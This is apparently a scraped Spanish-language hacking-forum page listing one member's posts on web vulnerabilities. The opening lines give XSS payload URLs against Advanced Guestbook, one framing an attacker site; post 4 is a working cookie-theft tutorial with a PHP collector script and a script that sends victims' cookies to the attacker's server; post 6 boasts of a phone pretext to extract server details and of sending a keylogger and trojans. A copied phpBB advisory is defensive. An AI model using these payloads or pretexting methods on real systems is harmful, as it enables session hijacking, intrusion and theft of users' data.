hwww.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframe
src=http://www.attackersite.com/>

http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAME
SRC="javascript:alert('XSS');"></IFRAME>

   1   Hacking / Bugs y Exploits / Re: Advanced Guestbook remote XSS  en: Hoy a las 19:58:05 
el hecho es que copiar y pegar informacion de sitios que reconocemos como securityfocus frsirt milw0rm etc. No tiene muxo sentido.

El chiste es aportar cierta informacion para que nos quede mas claro en que consiste el bug. o una forma mas practica de explotarla por ejemplo.

Pero te imaginas que cada miembro de el foro posteara todas las vulnerabilidades que mira por ai.

Si no esta claro no te estoy ofendiendo ni nada solo que los aportes no se deben basar en un copy/paste
   
 
2   Hacking / Bugs y Exploits / Re: Advanced Guestbook remote XSS  en: Hoy a las 00:10:03 
claro que sin ofender. tas haciendole biem a todos..xDD
   
 
3   Hacking / Bugs y Exploits / Re: Advanced Guestbook remote XSS  en: Hoy a las 00:09:22 
mousehack, supongo que tu objetivo es hacer que este foro tenga muxo contenido, pero andar posteando vulnerabilidades antiguas no tiene mucho sentido.

Por ejemplo las ultimas versiones de advanced guest book no son vulnerables a este XSS de hecho creo que la ultima vulnerable es la 2.3.1.

Ademas este guestbook viene acompañado con el phpinfo.php en su raiz y este es mas que sabido que tiene XSS.

Si el objetivo es ver un bug y venir corriendo a postearlo espero lo pienses.
   
 
4   Hacking / Hacking Básico / Re: XSS  en: 08 Noviembre 2005, 22:38 
-------------------------------------
La mejor forma de emplear XSS
=====================

Luego de que verificaste que era Vulnerable
-Lo mejor es emplear scripts que funcionen como cliente servidor, por ejemplo:
--->Creas el fichero cookies.php con la siguiente información:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
--------------------Hasta aquí
Line 1 - Obtiene del post que vas a enviar sólo la cookie
Line 2 - Crea el archivo archivo.txt
Line 3 - Dentro de archivo.txt mete la cookie (modo agregar)
Line 4 - Cierra el fichero y se guarda todo

--->Luego subis el fichero cookies.php a un servidor donde tengas hosting, o sea accesible desde la web, (por FTP, ssh o via web u otros)
--->Bien Suponiendo que tu host sea:
http://www.miservidor.com
quedaría
http://www.miservidor.com/cookies.php
-----------------------------------------------------------------------
                 FIN DE CONFIG. DEL SCRIPT TIPO SERVER

-----------------------------------------------------------------------
                 INICIO DE SCRIPT TIPO CLIENTE
---> Este script sólo hará que se conecte a tu server (este es el que se postea en el libro de visitas o tag's, ya que si lo haces desde el buscador solo obtendras la cookie actual, y no  todas.
code:
<script>window.location='http://www.miservidor.com/cookies.php?cookie='+document.cookie;</script>
ahora recibiras las cookies en tu archivo.txt

---------
Suerte
---------
Por cierto, ahora estoy modificando el virus de XSS cuando lo termine para que pueda ser usado por todos te lo envío para que hagas lo que queras con el.
   
 
5   Hacking / Bugs y Exploits / Re: Nuevo bug en los phpbb<=2.0.17  en: 07 Noviembre 2005, 14:35 
---------------------------
PARA LOS INDIOS
---------------------------
===============

phpBB: Ejecución de código arbitrario / SQL injection / Evasión de protección
Se han descubierto vulnerabilidades en phpBB (utilizado para definir y administrar foros de discusión, noticias, etc.), las cuales podrían ser explotadas por un atacante para ejecutar código HTML y PHP arbitrario o efectuar “SQL injection” en un sistema vulnerable.

Resumen
Errores de inicialización de variables podrían ser explotados por un atacante para ejecutar código HTML y PHP arbitrario o efectuar “SQL injection” en un sistema vulnerable.

Versiones Afectada

Estas vulnerabilidades afectan a las versiones de phpBB 2.0.17 y anteriores.

Detalle
1) Errores en la inicialización de variables:
- La variable “error_msg” en la función “usercp_register.php” no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable “forward_page” en la función “login.php” no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable “list_cat” en la función “search.php” no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable “signature_bbcode_uid” en la función “usercp_register.php” no es inicializada correctamente, lo cual puede ser utilizado para efectuar “SQL injection” de sentencias “field=xxx” en queries que operan en tablas de usuario, cuando la opción “magic_quotes_gpc” se encuentra habilitada.
- La variable “signature_bbcode_uid” en la función “usercp_register.php” puede ser utilizada además para inyectar, por ejemplo, el modificador “e” en el primer parámetro de una sentencia “preg_replace()”, lo cual implica que el segundo parámetro será evaluado como código PHP. Como el segundo parámetro es completado enteramente con la firma provista por el usuario, es posible ejecutar cualquier código PHP. Esto puede ser explotado independientemente del seteo de la opción “magic_quotes_gpc”.

2) Vulnerabilidades de evasión:
- En PHP5 (5.0.5 o anteriores) es posible registrar, por ejemplo, la variable global “$foobar” proporcionando una variable GET/POST/COOKIE con el nombre “foobar” pero también proporcionando una variable GPC llamada “GLOBALS[foobar]”. Si la variable es proporcionada de dicha forma, el código previo no tratará de dessetear “foobar” sino $GLOBALS, lo cual evade completamente la protección.
- Cuando la extensión de la sesión no es iniciada por un llamado a “session_start()”, PHP desconoce las variables $_SESSION o $HTTP_SESSION_VARS, lo cual significa que es posible llenarlas con cualquier valor, si “register_globals se encuentra habilitado. Combinado con el hecho que “array_merge()” no funcionará en PHP5, cuando al menos uno de los parámetros no es un arreglo, es posible que un atacante setee HTTP_SESSION_VARS a una cadena, evadiendo toda la protección, ya que “$input” termina vacía.
- Cuando “register_long_array” se encuentra deshabilitada, PHP no desconoce las variables HTTP_*. Esto implica que pueden ser completadas con cualquier contenido, aún no relacionado con las variables globales existentes. En este caso la protección no funciona.

Impacto
El impacto de estas vulnerabilidades es ALTO.

Recomendaciones

Recomendamos actualizar phpBB a la versión 2.0.18:

http://www.phpbb.com/downloads.php

Referencias
Para más información sobre este boletín:

Aviso original:
http://www.hardened-php.net/advisory_172005.75.html

Secunia:
http://secunia.com/advisories/17366/

phpBB:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=336756
   
 
6   Hacking / Bugs y Exploits / Una mezcla de hacking ético··)!  en: 03 Mayo 2005, 03:47 
Bueno, -) Hola, soy S0cr@t3x, sólo quería postear una pequeña historia sobre hacking ético, que la verdad me costo un poco.

Todo comenzó cuando, me pidieron probar la seguridad de un servidor, recuerdo que era un colegio de la capital, entonces puse manos al asunto, y comencé a penas llegue a casa, No me costo muxo sacar el SO, recuerdo era un Windows 2000, por supuesto uno piensa primero ante todo Win 2k con IIS 5.0 UNICODE/DECODE!!!!!!!!!,


y efectivamente era vulnerable, cuando se me pidió hacer una pequeña presentacion de cómo entre, expuse todo, hasta quienes habían publicado el Bug del UNICODE, cuando le toco hablar al administrador, por cierto un horrendo H4pones!!! Famosos por no ser nada tontos, me dijo k el nada tenía que ver con ese server si no que el administrava el de mi ciudad, yo pense mmmm! Y bueno se disculparon y me pidieron que tambien escaseara este, y disculparon lo del hack hacia el server central diciendo que lo estaba administrando una mujer,, (casi no eran machistas)

Cuando escanee el servidor de mi ciudad, me encontre con lo siguiente.
SO: Linux con Apache 1.3.39
Puertos abiertos: 25 y 80
25, no decia nada
80 web

mmmmm, le pase varios escanners, para seguir con la rutina semi-lammer Scanner+Bug+exploit, y recuerto pase el Shadow security scanner, lo que yo no sabía era que el puñetero SSS se guiaba por lo que obtenía al conectar con cierto puerto.

….pero al no recibir nada en el 25.. la cosa es que ninguno me detecto ningun bug, ni NFS, ni RFI, ni SQL Injections, nada………

Entonces aunque suene chistoso vi la peli, Hackers II take down, y recorde lo de la ingeniería social, y sucedido asi:

INICIO DE LLAMADA
S0cr@t3x: sí!, buenos días, me podría comunicar con la persona que
administra su página de internet.

- alo si, quien habla,
S0cr@t3x: alo si, habla Juan Cirstobal Gómez, yo soy estudiante de
un curso de redes en la Hemphill School, y hace poco conocí al
profesor Danilo, tengo entendido que trabaja en la universidad de ciencias comerciales, y es que yo
le pedí asesoría para montar un servidor de mail y web. El me dio
unos programas para unix, un unix solaris 7 que me presto un señor que
trabaja en IBW, me dio un tal esim, y un apache, pero me dijo que esos
programas ya estaban algo viejos, que mejor me bajara la ultima version

o me guiara deacuerdo a la configuracion de algun servidor, publico,
entonces me dijo que el mandaba algo ahi en su colegio, y me dijo que
le pidierá ayuda mas o menos de que software puedo usar o me guiara con
su servidor.

- a si bueno el prof. danilo si administra aquí, pero como guiarte desde
nuestro server?

S0cr@t3x:bueno, mejor si no tiene muxo tiempo solo deme el nombre de el
software de mail que tienen ustedes y el web, ustedes tb usan el esim?

- no nosotros usamos el Sendmail  8.11
S0cr@t3x: a okey y no tiene una dirección de mail, a donde le pueda
escribir o consultar

-   asi xxxx@xxx.com


Ahora si a buscar exploits se ha dixo, y pufff, casi era vulnerable a todo exploit de sendmail que encontraba

TAMBIEM
Enviando un keylogger dentro de un fichero PHP, este enviaba los logs a un servidor ftp que tengo en NO-IP.

Después de esto vi que este se tragaba todo, y le envie troyanoz y a la verga los Japoneses.

Bueno espero les haya gustado la historia, a veces no se sabe cuando nos va a servir la Ing. Social.